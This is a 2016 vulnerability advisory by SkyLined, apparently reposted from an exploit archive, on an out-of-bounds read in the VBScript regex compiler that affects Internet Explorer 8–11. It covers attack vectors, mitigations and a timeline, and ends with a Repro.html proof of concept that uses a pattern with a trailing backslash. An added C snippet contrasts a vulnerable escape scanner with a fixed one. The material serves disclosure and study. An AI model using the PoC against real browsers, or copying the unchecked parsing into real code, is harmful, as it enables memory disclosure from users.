VBScript RegExpComp::PnodeParse Out-Of-Bounds Read
Posted Nov 9, 2016
Authored by SkyLined

A specially crafted script can cause the VBScript engine to read data beyond a memory block for use as a regular expression. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to disclose information stored after this memory block. This includes all versions of Microsoft Internet Explorer.

tags | exploit
SHA-256 | de2a5025554f64ba3382cd282b48b1d88c6ba27472d9213565816e814c3c7bdb

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the sixth
entry in that series.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161108001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

VBScript RegExpComp::PnodeParse out-of-bounds read
==================================================
(The fix and CVE number for this bug are not known)

Synopsis
--------
A specially crafted script can cause the VBScript engine to read data
beyond a memory block for use as a regular expression. An attacker that
is able to run such a script in any application that embeds the VBScript
engine may be able to disclose information stored after this memory
block. This includes all versions of Microsoft Internet Explorer.

Known affected versions, attack vectors and mitigations
-------------------------------------------------------
* vbscript.dll
The issue is known to have affected versions 5.8.7600.16385 up to
5.8.9600.16384, and both the 32- and 64-bit vbscript.dll binaries.
It may also impact earlier versions as well as later versions as I am
not sure exactly when the issue was addressed by Microsoft.

* Windows Script Host
VBScript can be executed in the command line using cscript.exe/
wscript.exe. An attacker would need to find a script running on a
target machine that accepts an attacker supplied regular expression
and a string, or be able to execute his/her own script. However,
since the latter should already provide an attacker with arbitrary
code execution, no additional privileges are gained by exploiting
this vuln.

* Microsoft Internet Explorer
VBScript can be executed from a web-page; MSIE 8, 9, 10 and 11 were
tested and are all affected. MSIE 11 requires a META tag to force it
to render the page as an earlier version, as MSIE 11 attempts to
deprecate VBScript (but fails, so why bother?).
An attacker would need to get a target user to open a specially
crafted web-page. Disabling scripting, particularly VBScript, should
prevent an attacker from triggering the vulnerable code path.
Enabling *Enhanced Protected Mode* appears to disable VBScript on my
systems, but I have been unable to find documentation on-line that
confirms this is by design.

* Internet Information Server (IIS)
If Active Server Pages (ASP) are enabled, VBScript can be executed in
Active Server Pages. An attacker would need to find an ASP page that
accepts an attacker supplied regular expression and a string, or be
able to inject VBScript into an ASP page in order to trigger the
vulnerability.

Description
-----------
When a regular expression is used to find matches in a string, it is
first "compiled". During compilation, when a '\' escape character is
encountered, the RegExpComp::PnodeParse function reads the next
character to determine the type of escape sequence. However, if the last
character in a regular expression is a '\' character, the code will read
and use the terminating '\0' character as the second character in the
escape sequence. This causes the code to ignore the end of the string
and continue to compile whatever data is found beyond it as if it was
part of the regular expression.
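The following is an added illustration, not code from the advisory or from vbscript.dll: a minimal escape-sequence scanner written in the style of the bug described above, next to a bounds-checked version. The constructed buffer `memory` holds the pattern "ab\" followed by its NUL terminator and then unrelated adjacent data, so the unchecked scanner shows how a trailing '\' swallows the terminator and keeps parsing the bytes that follow.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: pattern "ab\" + NUL, then data that merely happens
 * to sit after the pattern in memory. 'limit' stands in for the end of
 * the readable region so the demo itself stays memory-safe. */
static const char memory[] = "ab\\\0SECRET";

/* Vulnerable style: after a '\' the next byte is taken as the escaped
 * character without checking whether it is the terminator. Returns the
 * number of bytes consumed before a NUL stops the loop. */
static int scan_pattern_unchecked(const char *p, size_t limit)
{
    size_t i = 0;
    while (i < limit && p[i] != '\0') {
        if (p[i] == '\\')
            i += 2;          /* blindly consumes p[i+1], even if it is '\0' */
        else
            i += 1;
    }
    return (int)i;
}

/* Hardened: a '\' that is the last character of the pattern is rejected
 * instead of being paired with whatever lies beyond the terminator. */
static int scan_pattern_checked(const char *p, size_t limit)
{
    size_t i = 0;
    while (i < limit && p[i] != '\0') {
        if (p[i] == '\\') {
            if (i + 1 >= limit || p[i + 1] == '\0')
                return -1;   /* dangling escape: malformed pattern */
            i += 2;
        } else {
            i += 1;
        }
    }
    return (int)i;
}

/* Bytes parsed beyond the pattern's own terminator (0 when none). */
static int bytes_past_terminator(int consumed, const char *p)
{
    int own = (int)strlen(p) + 1;
    return consumed > own ? consumed - own : 0;
}

int main(void)
{
    int u = scan_pattern_unchecked(memory, sizeof memory);
    int c = scan_pattern_checked(memory, sizeof memory);
    printf("unchecked consumed %d bytes (%d past the terminator)\n",
           u, bytes_past_terminator(u, memory));
    printf("checked result: %d (negative = rejected)\n", c);
    return 0;
}
```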

Time-line
---------
* June 2014: This vulnerability was found through fuzzing, but I was
unable to reproduce it outside of my fuzzing framework for unknown
reasons.
* April 2015: This vulnerability was found through fuzzing again.
* April 2015: This vulnerability was submitted to ZDI.
* May 2015: ZDI rejects the submission.
* November 2016: The issue does not reproduce in the latest build of
MSIE 11.
* November 2016: Details of this issue are released.

Cheers,

SkyLined



Repro.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
<script language="VBScript">
' VBScript helpers so the RegExp object can be driven from JavaScript.
Dim oRegExp
Set oRegExp = New RegExp
Sub RegExp_SetPattern(sPattern)
oRegExp.Pattern = sPattern
End Sub
Function RegExp_Execute(sData)
RegExp_Execute = oRegExp.Execute(sData)
End Function
</script>
<script language="Javascript">
// This PoC attempts to exploit a memory disclosure bug in VBScript.dll
// See http://blog.skylined.nl/20161108001.html for details.
// The pattern ends in a single '\', so the compiler reads past the string.
RegExp_SetPattern("\u0504\u0706\u0908\u0B0A\u0D0C\u0F0E\u1110\u1312\u1514\u1716\u1918\u1B1A\\");
var oObject = RegExp_Execute("23456789ABCD\0");
// This work by SkyLined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
</head>
</html>
